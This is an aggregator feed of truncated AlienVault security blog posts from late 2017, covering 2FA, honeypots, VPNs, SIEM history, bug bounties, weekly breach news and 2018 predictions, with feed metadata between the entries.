brand with personalized resumes and cover letters. These are essentials that our teachers always told us that we need growing up, and this is true; however, it is 2017, and with more students than ever before, the job market has become very competitive. The opportunities to find internships while an undergrad are still very much existent. We are going to take a look at what you can do to break away from the job searching norms by building your personal brand. Personal brand plays a key role in developing your identity of an aspiring security professional. This article will help guide you to become the nontraditional student that you need to be to land interesting interviews. The pitch. “Could you tell me a bit about yourself?” Be prepared to respond to this question comfortably at a moment’s notice. Know what your personal selling features are, and strut your achievements proudly and passionately, but not arrogantly. Knowing what to say in “elevator talk” situations allows us to network on-the-fly at any given moment. The resume. It is an obvious expectation of any serious employer that your resume looks good. Your resume will act as a professional summary of your identity, and employers will profile you accordingly. Dedicate some of your efforts to ensuring that your resume effectively and professionally reflects your skillset, goals, past experiences, and projects. Keep your resume up-to-date, and actively rework it when you can. The business card. Some people may consider a contact card as overkill, especially for students, but I disagree. The need for us to differentiate ourselves as students are becoming increasingly necessary, proportionate to the number of students being pumped out by academia and other routes for job-seekers to educate themselves. I printed some contact cards using VistaPrint for my first few conferences (DEF CON, Black Hat USA, and HackFest), and I have received only positive feedback; in fact, the CEO of the cybersecurity firm that I will be interning at in May was impressed, responding “Wow, this kid has a business card? He’s serious.” The act of handing someone a contact card alone ]]> 2017-12-20T14:00:00+00:00 http://feeds.feedblitz.com/~/511795818/0/alienvault-blogs~Building-Personal-Brand-From-One-InfoSec-Student-to-Another www.secnews.physaphae.fr/article.php?IdArticle=453446 False Guideline None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC Someone said those words to me the other day.  As an InfoSec professional, I’ve have grown accustomed to this type of indignant proclamation.  My jaw no longer drops to the table anymore when I hear folks speaking this way, but I still have trouble stifling an audible sigh. As usual, when confronted with this reality, I experience the usual stages of information security grief.  Why don’t they get it?  Where have we gone wrong? Should we give up?  Who still uses the phrase “Deal with it?” Fortunately, the statement made by my password “pal” was in the context of getting set up with a Multi-factor login system.  I have been a strong supporter of Two-Factor authentication for a long time.  I even took the bold step to predict that at least one social media platform would force 2FA on all their subscribers this year.  So far, this has not happened, and even though no one is forcing 2FA upon their subscribers, it seems to be getting some attention and adoption in many corporate settings. In fact, a new regulation in New York is prescribing multi-factor for all remote logins unless the CISO has approved in writing the use of reasonably equivalent or more secure access controls. What is the meaning of a “reasonably equivalent control”?  In InfoSec, we call those “compensating controls”. These controls were introduced in the first version of the Payment Card Industry Data Security Standards (PCI DSS). The standard definition of compensating controls consists of 4 parts: Compensating controls MUST: Meet the intent and rigor of the original control. Provide a similar level of defense as the original requirement. Be “above and beyond” other requirements.  Be commensurate with the additional risk imposed by not adhering to the original requirement. That is a tall order to fill, and it seems much more difficult than instituting a 2FA solution. There are so many multi-factor options out there today; one has to wonder why people aren’t jumping on board with these systems? 2FA isn’t limited only to corporate systems.  Some tools that folks can use on their personal accounts are free, such as some of the “authenticator” applications offered by some vendors.  Some services such as Twitter, and at least one security organization (EC-Council), are still using text-based two-step verification, and we know that isn’t perfect, but it is still better than no security. A 2FA system eases the sting of bad passwords considerably.  Now when someone tells me “that’s my password pal, deal with it”, I no longer have to sigh.  While my internal cynic may respond in kind “well now you have 2FA, so YOU deal with it, Sparky”, I am comforted, however slightly, that an attacker has to jump one more hurdle before he can log into the account of mister “Spring2017”.   ]]> 2017-12-19T14:00:00+00:00 http://feeds.feedblitz.com/~/511569684/0/alienvault-blogs~My-Password-Pal www.secnews.physaphae.fr/article.php?IdArticle=452707 False None None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC Then along came the hyperlink. (yes, that’s what we called it when such things were shiny and new and disruptive. Quit laughing. Shhh.) And everything changed, and technical writers and editors sat around and talked about how this was going to alter our processes. But books were never going to stop being shipped with software, so it probably was just a niche thing. You can stop laughing at any point. I’ll wait. . . . done? Good. Where was I? Oh yeah. Software documentation on paper. We all know that the world has gone through a few major upheavals since then, and one of the most glorious is the embracing of Agile methodology. Not just because, well, Agile, but because to be totally honest, software has always been like that; it’s just that before, when code froze and unfroze and changed and refroze, those freezes were not unlike what’s happening to the permafrost now, which is to say, a sort of very thaw-ish kind of freeze. Which is to say, not a freeze at all. It’s just that back then, documentation teams pulled all-nighters at the end of a ship cycle to document things to make it appear as if we’d always planned the software to be like it was at the time it’s shipped. My profession was complicit in this unfrozen freezing for a long time, and for writing documentation that made it appear as if software and documentation were some kind of united front. I don’t think that, ultimately, we did anyone any favors in behaving that way. It’s a relief to have moved along from that place. The first time I saw the phrase “as-built documentation” I may have cried quiet tears of joy. One of the great things about writing and editing documentation at AlienVault is that the teams have entirely embraced this methodology. And while there are plenty of different ways to approach the mechanisms of producing “docs like code,” here we’re using Bitbucket (through Sourcetree) as a repository, and using MadCap Flare to generate HTML and PDF docs for consumption. And oh happy day, we are finally, wholly, collaborative. No more of the “I’m in the doc and you have to wait until I’m done if you want to work on it.” No more of the “Hello. My name is Reviewer. You overwrote my changes. Prepare to die.” We can build the docs together, at roughly the speed in which the software is being coded, without having to wait around for the (wholly mythical, in my experience) code freeze before we begin. The benefits for technical editing, specifically, are phenomenal. When my writers finish working on a ticket (Did I mention Jira yet? I’m so happy to be working in a ticketing system instead of in the oubliette of my inbox), I can look at what they wrote directly in the Bitbucket repository, and I only need to edit what they changed, not the entire document each time. What this means is that, ultimately, we’re able to create documentation that’s more accurate, that matches what you see in the software, that allows you to fi]]> 2017-12-18T14:00:00+00:00 http://feeds.feedblitz.com/~/511322688/0/alienvault-blogs~Agile-Development-Agile-Documentation www.secnews.physaphae.fr/article.php?IdArticle=452120 False None None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC life of its own a few days ago. But I’m reminded of the ending monologue by Morgan Freeman in “The Shawshank Redemption”, in which he starts off by saying, “Get busy living or get busy dying.” So the thought of the week is, “Get busy securing, or get busy insecuring.” Hmm doesn’t quite have the same ring to it. Will have to think of a better word – but you catch my drift. Let’s jump into this week’s interesting security bits Mirai Mirai on the wall I picture Brian Krebs as being a Liam Neeson type – he sees that his website is under attack by a never-before seen DDoS attack. He mutters to himself, “I don’t know who you are, but I will hunt you, I will find you, and I will blog about it until you get arrested, prosecuted, and thrown in jail.” It so happens that this week the hackers behind the Mirai botnet and a series of DDoS attacks pled guilty. The Hackers Behind Some of the Biggest DDoS Attacks in History Plead Guilty | Motherboard Mirai IoT Botnet Co-Authors Plead Guilty | KrebsonSecurity Botnet Creators Who Took Down the Internet Plead Guilty | Gizmondo Bug Laundering Bounties Apparently, HBO negotiated with hackers. Paying them $250,000 under the guise of a bug bounty as opposed to a ransom. Maybe in time, it will be found that HBO acted above board, maybe it was a sting operation, maybe it was a misconstrued email. The worrying fact is that any payment exchange system can be used to launder money. However, bug bounty providers don’t (as far as I can tell) have financial services obligations. Does the bug bounty industry need more regulation (shudder)? Leaked email shows HBO negotiating with hackers | Calgary Herald Remember the 'Game of Thrones' leak? An Iranian hacker was charged with stealing HBO scripts to raise bitcoin | USA Today Uber used bug bounty program to launder blackmail payment to hacker | ars Technica Inside a low budget consumer hardware espionage implant I’m not much of a hardware expert – actually, I’m not much of a hardware novice either. But this writeup by Mich is awesome. I didn’t even know there were so many ways to sniff, intercept and basically mess around with stuff at such small scale. It’s extremely detailed and I’ve permanently bookmarked it for future reference. ]]> 2017-12-15T14:00:00+00:00 http://feeds.feedblitz.com/~/510731884/0/alienvault-blogs~Things-I-Hearted-This-Week-th-December www.secnews.physaphae.fr/article.php?IdArticle=451486 False Guideline,Medical,Cloud APT 38,APT 37,Uber None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC If you’ve ever had an ant problem in your home, it’s likely that you’ve used ant traps. Ants are attracted to food high in carbohydrates, especially sugary stuff. Ant traps work because they contain bait that lures ants in. So, they might go for your ant trap rather than the cookie crumbs you dropped on the kitchen floor. When used properly, the trap allows you to kill ants before they infest your home. Honeypots in computer networks use the same concept. Cyber attacks travel through the internet to private computer networks constantly. What if you could put something in your network that will attract attacks so you can catch them before they hit your important server and client machines? How do you use the honeypot concept for your network? So, you want to set up something on your network that looks like an attractive computer to attack. Should you just install Windows 3.1 on a legacy machine, make sure its TCP/IP interface has basic functionality, and plug an Ethernet cable into it? No, that would be a terrible idea. Ideally, a honeypot should resemble a computer on your production network, but with weaker security. In the long run, it’s probably better to make your honeypot a virtual machine. These are easier to maintain and are more scalable. You can tinker around with the virtual hardware specs more easily, and experiment with different amounts of memory and CPU cores. Plus, because virtualization sandboxes your honeypot OS from its host machine, allowing you to contain the effects of cyber attacks more effectively. Did your virtual machine honeypot get infected with ransomware? Just delete it and its virtual disk from your VM client and make a new one! Install your honeypot virtual machines from the same disc images you use to install operating systems in your production network. Configure them in much the same way, with the same drivers and applications. Just make the security a bit weaker than your information security policy requires. Make fake accounts that are local to your honeypot, and create weak passwords. Be sure that your honeypot doesn’t automatically install security patches, and make the most recently installed patches a few months old. Configure its local firewall to have more open TCP/IP ports, and fewer filtered ports altogether. Leave more of the default OS and application settings. That way, if an attacker OS fingerprints your honeypot, they can try exploiting some vulnerabilities that have been known for a long time. Or not. The basic principle of making your honeypot like your production machines, but less security hardened, should be maintained in most situations. But all the other details may be tweaked and modified according to your specific needs. Whatever configuration and set up is best may take some experimentation to determine. A good honeypot will allow you to understand what sort of cyber attacks your production machines may face. Having a honeypot that teaches you about malicious network activity will likely take you some trial and error. Your honeypot must also be set up so that it constantly generates logs on every applicable function. At the very least you should make sure that its OS system logging works and there should be constant logging on its built-in software firewall. If you use some sort of antivirus software in your honeypot, its logs are important as well. You can then run all those logs through a SIEM, just like all of the other logs your network generates. The next question is, where should you put your honeypots? Putting a ]]> 2017-12-14T14:00:00+00:00 http://feeds.feedblitz.com/~/510471676/0/alienvault-blogs~Explain-How-Honeypots-Work-to-Me www.secnews.physaphae.fr/article.php?IdArticle=450778 False None None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC Juniper Research, suggests that the rapid digitization of consumers’ lives and enterprise records will increase the cost of data breaches to $2.1 trillion globally by 2019. About 1.9 billion data records got exposed in the 918 data breaches that occurred in the first half of 2017—up 164 percent from the last half of 2016. According to a recent AT&T Cybersecurity Insights report, some 80 percent of the IT and security executives surveyed said their organizations came under attack during the previous 12 months. This rising threat trend, coupled with the rapid growth of sophistication in malware, ransomware, DDoS, and social engineering attacks has created a conundrum. How do we protect ourselves in an increasingly connected world? There is really no single answer or remedy to our digital vulnerabilities. Cybersecurity at its core is risk management: people, process, policies, and technologies.  The latter category offers some interesting and useful tools to help survive in the cyber ecosystem. Nothing is completely un-hackable, but there is a myriad of emerging technologies that can help us navigate the increasingly malicious cyber threat landscape. Some of these cutting-edge technologies include: Artificial Intelligence (human/computer interface) and Machine Learning Automation and Adaptive Networks Big Data: Real-time Analytics and Predictive Analytics Biometrics and Authentication Technologies Blockchain Cloud Computing Cryptography/Encryption Quantum-computing and Super-Computing Artificial intelligence (AI) has become a major focus area of cybersecurity investments. AI and augmented reality technologies are no longer things of science fiction and many leading companies are already developing technology to distribute artificial intelligence software to millions of graphics and computer processors around the world. Some of the basic activities computers with AI are designed for include: Speech recognition; Learning / Planning; and Problem solving. For cybersecurity, synthesizing data is surely an advantage in mitigating threats. Machine Learning is the science of getting a computer to act without programming. It often combines with AI and can be thought of as the rapid automation of predictive analytics. In cybersecurity terms, machine learning provides the fastest way to identify new attacks, draw statistical inferences and push that information to endpoint security platforms. George Washington University’s Center for Cybersecurity and Homeland Security in a symposium on Trends in Technology and Digital Security summed up AI’s cyber role and challenges:  “Will AI benefit the attacker or the def]]> 2017-12-13T14:00:00+00:00 http://feeds.feedblitz.com/~/510151904/0/alienvault-blogs~Emerging-Technologies-and-the-Cyber-Threat-Landscape www.secnews.physaphae.fr/article.php?IdArticle=449716 False Guideline None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC Anyone who’s worked in any field related to internet security for any length of time has used the term hacker, or had the term used on them. We don’t use this term in AlienVault documentation, and thanks to some questions from fellow wordgeeks outside the company, I wanted to talk about why that is. One of the primary missions of technical documentation is to be absolutely clear and context-neutral. You can’t know what the technical, educational, or socio-political background of your readers is; if you’re lucky and you work with an awesome sales team with global reach, the people reading your documentation come from an incredibly diverse, global audience, so the language used in your docs should be impossible to misinterpret no matter who or where the reader is. Back in the 13th century, a hacker was “a chopper, cutter," perhaps also "one who makes hacking tools." But by the time the term was used to refer to computers or technology generally, in 1975, it was already divergent, meaning both "one who works like a hack at writing and experimenting with software, one who enjoys computer programming for its own sake," and "plodding, routine work." Any time you have to rely on a modifier to make it clear what you mean, and your choice is between diametric opposites, you’re dealing with a problematic and highly contextualized term. For an example of this, you don’t have to look any further than Charlie Miller and Chris Valasek, the security researchers (there’s one term) who in 2015 figured out how to remotely take control of a Jeep Cherokee through Uconnect, and then presented that information at the Black Hat conference (there’s another connotation) and made the code available on the internet. They’d worked with Chrysler in advance, of course, so people paying attention could protect themselves. Sorta. And therein lies so much ambiguity. For the people who were paying attention, Miller and Valasek were the good kinds of hackers who find vulnerabilities in advance of the bad kinds of hackers finding those same vulnerabilities and exploiting them. The cars are deemed “hackable” (that’s bad, other than when you want to customize those features, then that’s good.). Miller and Valasek are “hackers” according to the community (that’s good) but also “hackers” to Chrysler (that’s bad.) See the problem there? What you say and how you say it is entirely a function of your contextual relationship to the code.   The term hacker is much like many other jargon terms that have fallen into pejorative use by the mainstream while still being claimed or re-claimed by those once denigrated by them…and all this ambiguity is not at all acceptable for inclusion in context-neutral documentation. As much as I cringe at referencing Wikipedia as a reference, this article is spot-on. As usage has spread more widely, the primary misunderstanding of newer users conflicts with the original primary emphasis. In popular usage and in the media, computer intruders or criminals is the exclusive meaning today, with associated pejorative connotations. (For example, "An Internet 'hacker' broke through state government security systems in March.") In]]> 2017-12-12T14:00:00+00:00 http://feeds.feedblitz.com/~/509846496/0/alienvault-blogs~Its-Only-A-Hacker-If-Its-Linus-Himself www.secnews.physaphae.fr/article.php?IdArticle=449180 False None None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC The flip side While budget may not be as free-flowing as one may assume, it doesn’t mean that companies have been completely negligent. 65% of respondents stated they are more up-to-date with patching than they were previously, and half say they are using threat intelligence more regularly to stay ahead of emerging threats. With a further 58% claiming to have carried out a review of their organizations cyber security posture following the attacks.   This is encouraging, as it means companies are not completely ignoring the challenges they face – and are leveraging existing investments to help get their companies in a better position. Although, as the attacks have shown, prevention alone isn’t enough and it would also be prudent for organizations to focus their efforts on threat detection and response. A makeover? For IT professionals, 22% said their family and friends are more interested in hearing about their work, and 27% believe most people in their organization listen to their IT advice more than they did before. Unfortunately, it hasn’t translated to great financial rewards with 10% have experienced an increase in job offers, or managed to negotiate a pay increase following the attacks. Incident Apathy? IT Security remains a challenging environment within which to work where resilience is the key to success. The sheer number of incidents that are reported on an almost daily basis may also be a contributing factor towards organizational apathy towards incidents. While attacks cannot be prevented, and IT Security may be a cost that organizations have to bear as a price of doing business in the digital age. It doesn’t necessarily mean that there are no options. Many security fundamentals can be implemented with little capital needed to source new products. Rather the]]> 2017-12-11T14:00:00+00:00 http://feeds.feedblitz.com/~/509270160/0/alienvault-blogs~The-Impact-of-NotPetya-and-WannaCry www.secnews.physaphae.fr/article.php?IdArticle=448378 False None NotPetya,Wannacry None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC Dr. Jessica Barker was the opening keynote and made some great points about optimism and how positive reinforcement is a far better motivator in security than the usual negativity. As I’m one that likes to take on board good ideas and implement them as quickly as possible – today’s wrap up will feature an optimistic and bright tone. So, put on your rose tinted glasses, sit back, and enjoy this week’s wrap up. Uber invests in Florida youth A hacker only identified as a 20-year old Florida man, was apparently behind the Uber breach a year ago. Uber was so grateful it awarded him $100,000 via HackerOne bug bounty platform, but wanted to keep its act of philanthropy quiet. No word on whether the youth will spend the money on an orphanage or an animal shelter, but we are hopeful. Uber hacked by a 20-year-old man in the US | Computer Weekly Uber paid 20-year-old man to hide hack, destroy data | ZDNet Three Uber security managers resign after CEO criticizes practices | Reuters $60m in bitcoin shared The days of Robin Hood aren’t over. Over $60m in cryptocurrency has been involuntarily redistributed after hackers bloke into Slovenian-based bitcoin mining marketplace NiceHash. More than $60 million worth of bitcoin potentially stolen after hack on cryptocurrency site | CNBC Bitcoin: $64m in cryptocurrency stolen in 'sophisticated' hack, exchange says | The Guardian $60m Bitcoin heist potentially hits cryptocurrency mining site | CBRonline Three ways to improve cybersecurity maturity I really like the name, “The Rochford Files” which is the contributed blog by Oliver Rochford on CSO. Keeping in tune with my optimistic theme, the subtitle is “here’s what’s holding us back” – but I’d rather rephrase it as “Here are our greatest opportunities”. 3 common cybersecurity maturity failings Predictions It’s that time of year for everyone to collectively gaze into crystal balls and predict what the new year will bring. I jumped onto the bandwagon myself and boldly made some predictions. The good thing about the future though is that it never comes, so you can never be proven wrong! Six Cybersecurity Predictions for The Year Ahead | AlienVault ]]> 2017-12-08T14:00:00+00:00 http://feeds.feedblitz.com/~/507506118/0/alienvault-blogs~Things-I-Hearted-this-Week-%e2%80%93-th-December www.secnews.physaphae.fr/article.php?IdArticle=447588 False Guideline Uber None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC Cloud computing, ransomware, IoT, GDPR and technology politics poised to make a significant impact on the world of security in 2018 It’s that time of the year again – the time for us to start gazing into crystal balls, pulling out the ouija board, and taking a DeLorean up to 88 miles per hour, all in an attempt to predict what the coming year will bring to information security. After extensive thought on the topic, I’ve come up with six predictions for 2018. Let’s take a deep dive into each. Lack of in-house expertise will cause ongoing cloud security woes Are clouds secure? Are they not? Are we going to move workloads to the cloud? Are we not? Over the last few years, these questions have been repeated over and over within many organizations. However, as more companies have made the move to the cloud, vetted providers, and developed their cloud strategy, confusion has lessened – but security woes have not. In the year ahead, we’ll continue to see a distinct lack of in-house cloud expertise resulting in security troubles for many organizations. While cloud providers offer adequately secure platforms, users still have a responsibility to ensure they are doing their part toward securing their data in the cloud (think the shared security model). This includes monitoring for security threats within the cloud environment, and equally ensuring cloud environments are properly configured. But, many IT and security professionals aren’t aware of their role in cloud security, or are aware but don’t know the best way to execute on their responsibilities. There have been countless cases in 2017 whereby enterprises have left private information publicly exposed, which has resulted in huge breaches. While most resulted from a failure to properly secure Amazon Web Services (AWS) buckets, this is not the only cloud vulnerability. For example, many people also found that their information was shared publicly via Microsoft’s docs.com service. Education and awareness around cloud security and the shared security model can go a long way in minimizing risk and keeping company data safe – regardless of whether it’s on-premises or in the cloud. Ransomware will remain one of the most popular attack methods Ransomware has dominated many news cycles throughout 2017. And, unfortunately, we won’t see this attack vector slow down anytime soon. With lower execution costs, high returns and minimal risk of discovery (compared to other forms of malware), ransomware has quickly become a preferred method of attack for cybercriminals. And it’s now easier than ever for virtually anyone – even individuals with minimal security knowledge – to extort money from companies and individuals through do-it-yourself ransomware toolkits or via the services of a Ransomware-as-a-Service (RaaS) provider. Cybercriminals always aim to take the path of least resistance while achieving maximum ROI, and RaaS lets them do just that. While security controls continue to improve and definitely help companies defend against ransomware, the threat vector is becoming increasingly sophisticated and exacerbated by the growth of the “Internet of Things (IoT).” The proliferation of IoT devices has vastly expanded the network of potential targets for cybercriminals – making the “ransomware of IoT” the security world’s new nightmare. The debate around insecure IoT devices will heat up ]]> 2017-12-07T14:00:00+00:00 http://feeds.feedblitz.com/~/506871354/0/alienvault-blogs~Six-Cybersecurity-Predictions-for-The-Year-Ahead www.secnews.physaphae.fr/article.php?IdArticle=446446 False None None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC One of the issues I’ve seen in companies is the idea that we can do it all, on our own, when it comes to security. One underlying issue is nasty vulnerabilities on company websites. We can test all day every day for vulnerabilities, but it’s similar to when an author writes and attempts to edit his/her own book; they miss that significant typo without realizing it. So how can we find outside editors with sharp eyes? Initially, for the AlienVault website, we had a simple web page to explain how to report vulnerabilities found on our website via email. This was great but it created a new set of issues of having to manually manage these reports via a spreadsheet. We tried to script automated responses and wrote a query to sift out duplicated reports, but it took a lot of time and effort. We needed to find a better way to manage our vulnerability reporting program, which we determined was HackerOne. With HackerOne and their triage services we now have a sturdy database with ticketing capabilities. Here at AlienVault we’ve also taken advantage of their 3rd party ticketing system integration so once the triage team deems a ticket both a valid vulnerability and not a duplicate, we create a ticket directly in our ticketing system with all pertinent information. Bi-directional communications go through our ticketing system, ensuring nothing is lost or accidentally forgotten. This requires only one project manager to interact with HackerOne and the contributing hackers to verify that issues are resolved. When issues are resolved, we (the contributing hacker and AlienVault Project Manager) can decide on the proper disclosure of the vulnerability to the public. The purpose of public disclosure via HackerOne is to show a few things: That we are transparent and part of the community in the idea to help secure our internet. To allow for recognition of external security researchers and hackers, as they deserve applause for their contributions. And finally, to share how to fix/remediate the vulnerability with fellow security professionals. The whole program and process has increased our efforts to secure our domains. What used to be a 5 day response and an unknown remediation time is now merely a 1-2 day response with a reasonable remediation timeline. This new process with HackerOne has enabled us not just to streamline our vulnerability reporting and increase our response time thank our researchers by rewarding them reputation points. Click here for more details on the AlienVault HackerOne program. Here’s a sample of our Thank You page, where we recognize the contributions of volunteer hackers!     ]]> 2017-12-05T14:00:00+00:00 http://feeds.feedblitz.com/~/505538142/0/alienvault-blogs~AlienVault-Now-Using-HackerOne-for-Responsible-Vulnerability-Reporting www.secnews.physaphae.fr/article.php?IdArticle=445084 False None None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC The recently discovered KRACK vulnerabilities affecting WPA2 have encouraged people to talk about the benefits of Virtual Private Networks. I think that's great! Ideally, we should all be using VPNs at home, in the office, during your commute, over Wi-Fi, and over Ethernet. But in order to use VPNs, it helps to understand how they work and how they make your internet use more secure. A VPN is a series of virtual connections routed over the internet which encrypts your data as it travels back and forth between your client machine and the internet resources you're using, such as web servers. Many internet protocols have built-in encryption, such as HTTPS, SSH, NNTPS, and LDAPS. So assuming that everything involved is working properly, if you use those ports over a VPN connection, your data is encrypted at least twice! Many enterprises will insist that their employees use their VPN if they're working remotely by connecting to their office network from home. Sometimes people will use a VPN when they're using BitTorrent to pirate media so that they don't get caught and their ISP can't stop them. I don't condone piracy. But to those people, I strongly suggest avoiding VPNs which are advertised through ads on The Pirate Bay as they are likely not what they seem and may even be malicious. Sometimes people use VPNs because they're understandably conscientious of their everyday security. That's an excellent reason to use them. PCs, smartphones, tablets, dedicated servers, and even some IoT devices can be endpoints for a VPN connection. Most of the time, your client will need to use a VPN connection application. Some routers also have built-in VPN clients. Unlike proxy networks such as Tor, VPNs shouldn't noticeably slow down your internet traffic under usual circumstances. But some VPNs are faster than others, and one of the most important factors is how many VPN clients are using a VPN server at any given time. A VPN connection usually works like this. Data is transmitted from your client machine to a point in your VPN network. The VPN point encrypts your data and sends it through the internet. Another point in your VPN network decrypts your data and sends it to the appropriate internet resource, such as a web server, an email server, or your company's intranet. Then the internet resource sends data back to a point in your VPN network, where it gets encrypted. That encrypted data is sent through the internet to another point in your VPN network, which decrypts the data and sends it back to your client machine. Easy peasy! Different VPNs can use different encryption standards and technologies. Here's a quick list of some of the technologies that a VPN may use: Point-to-Point Tunneling Protocol: PPTP has been around since the mid-1990s, and it's still frequently used. PPTP in and of itself doesn't do encryption. It tunnels data packets and then uses the GRE protocol for encapsulation. If you're considering a VPN service which uses PPTP, you should keep in mind that security experts such as Bruce Schneier have]]> 2017-12-04T14:00:00+00:00 http://feeds.feedblitz.com/~/504810234/0/alienvault-blogs~Explain-How-VPN-Works www.secnews.physaphae.fr/article.php?IdArticle=443987 False None None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC thankful for all the good in their life. The best things in life: SIEM and log management, crowd-based threat intelligence, vulnerability assessment, asset discovery, and intrusion detection. I am Root Apple found itself in the headlines as it was revealed that anyone could log in with root credentials without a password. I’m sure employees Geniuses at Apple stores were delighted with customers trying out the hack on display units. While many experts bemoaned the irresponsible disclosure of the vulnerability, it was apparently known on the Apple developer forums and thought of more as a bug. Perhaps one of the most impressive aspects of this debacle was how quickly Apple turned it around and issued a patch within a day. I don’t know what they put in their coffee at Apple HQ, but I’ll have two! Anyone can hack MacOS High Sierra just by typing “root”. | Wired New security update fixes macOS root bug | ars Technica Apple releases update to fix critical macOS High Sierra security issue | The Verge Portable Faraday Cage This story caught my attention because of its simplicity.  A man in Australia was sacked from his job after it was discovered the 60-year old electrician blocked his whereabouts by storing his personal digital assistant, that has a GPS inside, in an empty foil packet of Twisties, a puffy cheese-based snack that is popular in Australia. I can only imagine how the prosecution kept a straight face claiming the man was using an elaborate Faraday cage while holding up an empty packet of crisps (chips). Employee used crisp packet as ‘Faraday cage’ to hide his whereabouts during work | Telegraph Net Neutrality Net neutrality is a hot topic at the moment, there are some strong proponents and a lot of dialogue ongoing. To coin a phrase, everything is fair in love, war, and online comments. Jeff Kao used natural language processing techniques to analyse net neutrality comments submitted to the FCC from April-October 2017 – and at the risk of sounding like a Buzzfeed article – the results were pretty disturbing. More than a Million Pro-Repeal Net Neutrality Comments were Likely Faked | Hackernoon Holiday Cybersecurity guide The lovable reprobate Rob Graham posted a great guide for anyone visiting relatives during the holidays, and what you can do to help them become more secure. It’s a very decent list that’s worth checking out. Your holiday cybersecurity guide | Errata Security Uber breach Ride share company Uber ]]> 2017-12-01T14:00:00+00:00 http://feeds.feedblitz.com/~/502870788/0/alienvault-blogs~Things-I-Hearted-this-Week-%e2%80%93-st-December www.secnews.physaphae.fr/article.php?IdArticle=443447 False None Uber None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC It’s the most wonderful time of the year. The trees on my street have almost completely shed their leaves. My neighbors are stringing multicolored lights on their houses. My local shopping mall has started to play various versions of “Jingle Bell Rock,” recorded by many of the stars of top 40 on radio from the past few decades. My friends are coming to me with malware-infected smartphones, eager for my wizardry. That’s right; Computer Security Day is upon us! I plan on making a trip to my nearby gift shop and while feeling certain about finding an old-fashioned greeting card and enclosing a voucher for antivirus software to acknowledge this special day, we ought to appreciate how cybersecurity has advanced in recent years. Security Event and Information Management is something that didn’t exist until the 21st century, it’s evolved over the past few decades and it illustrates how far we have come. Before there was SIEM, there was SEM Anyone who has ever had an administrative role in a network knows that IDS and IPS generate a lot of logs and event information. Security related logs usually are full of false positive alerts, and security practitioners need to find the alerts that they should actually pay attention to in order to prevent and respond to security problems. By the late 1990s, IDS and IPS output started to become overwhelming for human beings. Security Event Management arose to tackle the problem. Necessity is the mother of invention, eh? SEM handles events to provide real-time monitoring, console views, event correlation, and notifications. When properly configured and used, SEM provides administrators with a central interface for all of the security events that computers and network appliances in a network record. If event data from another device is accidentally lost after being sent to a SEM system, the SEM will still retain it. Events can be sorted by significance according to configurable criteria. Another important benefit is that with the help of a SEM’s reporting tools and other features, SEM can help organizations comply with regulatory frameworks which may be applicable to their industry, such as HIPAA, GLBA, PCI-DSS, and Sarbanes-Oxley. There's no "I" in SEM. If there were, it'd be SIEM When SEM was invented in 1999, the technology had weaknesses, so Security Information Management (SIM) systems appeared on the market around the same time. One of the main weaknesses of only processing security data through log management and SEM is analysis. SIM was invented to fill that void. SIM focuses on logs while SEM focuses on events. SIM can send logs to a console which generates charts, graphs, and reports which can help human beings make sense of network security trends. I don’t know about you, but I totally geek out when I see graphs so I really appreciate what a lot of SIM software can do. SIM can also store security related information over a long period of time which can also aid in regulatory compliance and forensics when used the right way. Some combinations are terrible. I believe putting shampoo and conditioner in the same bottle is as misguided as putting ketchup and mustard in the same bottle. But other combinations are fantastic, such as putting mint in chocolate and putting anime scenes in Japanese RPGs. Combining SEM and SIM falls into the latter group, and it makes perfect sense. When SEM and SIM combine their extraordinary powers, you get Security Information and Event Management. Mike Rothman estimates that the first SIEM products emerged around 2001, which is a mere couple of years after SEM’s emergence. Mark Nicolett and ]]> 2017-11-30T14:00:00+00:00 http://feeds.feedblitz.com/~/502230328/0/alienvault-blogs~In-Honor-of-Computer-Security-Day-Let%e2%80%99s-Celebrate-the-Evolution-of-SIEM www.secnews.physaphae.fr/article.php?IdArticle=442594 False None None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC Red Teamers Can Learn Secrets by Purple Teaming Red teams; a diary from the garden of Red versus Blue Be a Red Teamer to be a Better Blue Teamer: Pen Testing ala Jayson Street Red teamers are a proud lot. They particularly pride themselves on being able to "get into" any objective, be it a building or a confidential file. Penetration Testing is a key tool for most Red Teamers in InfoSec. Pen Testing involves using various tools and methods to show a company how a bad guy would access their information. Here are some educational blogs on Pen Testing: How Penetration Testers Use Google Hacking  Penetration Testing vs. Vulnerability Scanning - What’s the Difference? Do I Need a Penetration Test? But I decided to have a bit of fun with it too. I ran a Twitter poll and came up with this infographic based on my findings from the poll: I'd like to do a similar poll and infographic for Blue Team, but the only animal I can think to propose in a poll is the faithful, beloved dog. They are protective, loyal and love their humans.       ]]> 2017-11-28T14:00:00+00:00 http://feeds.feedblitz.com/~/500912832/0/alienvault-blogs~Animals-Associated-with-Red-Team www.secnews.physaphae.fr/article.php?IdArticle=441255 False None None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC State of Vulnerability Risk Management Report is due. This year we are particularly excited because we collaborated with the exploration of a potential threat intelligence source and also our partnership with the AlienVault Labs Security Research Team for the research related to malware correlation. The analysis of this year’s vulnerability trends could not come at a better (or worse) time since several relevant data breaches hit the news wires lately. The “400-pound gorilla” in the house is Equifax, with its multi-million customer records data breach and its patchable vulnerability on Apache Struts exploited by attackers to gain access to the compromised data. We will see from our 2017 State of Vulnerability Risk Management Report that these patch management delays are quite common, but avoidable nevertheless. In the 2017 State of Vulnerability Risk Management Report we analyzed over a million of our customers’ anonymized unique security vulnerabilities. (By unique we mean security vulnerabilities that affect a specific customer, a unique host, on a unique TCP/UDP port). For the most part we use CVE and CWE categorization to correlate vulnerabilities, together with the presence of the 30+ unique threat intelligence feeds that NopSec Unified VRM utilizes, which include exploit-db and Metasploit exploits, active malware and targeted attack data, vendor patch data, social media 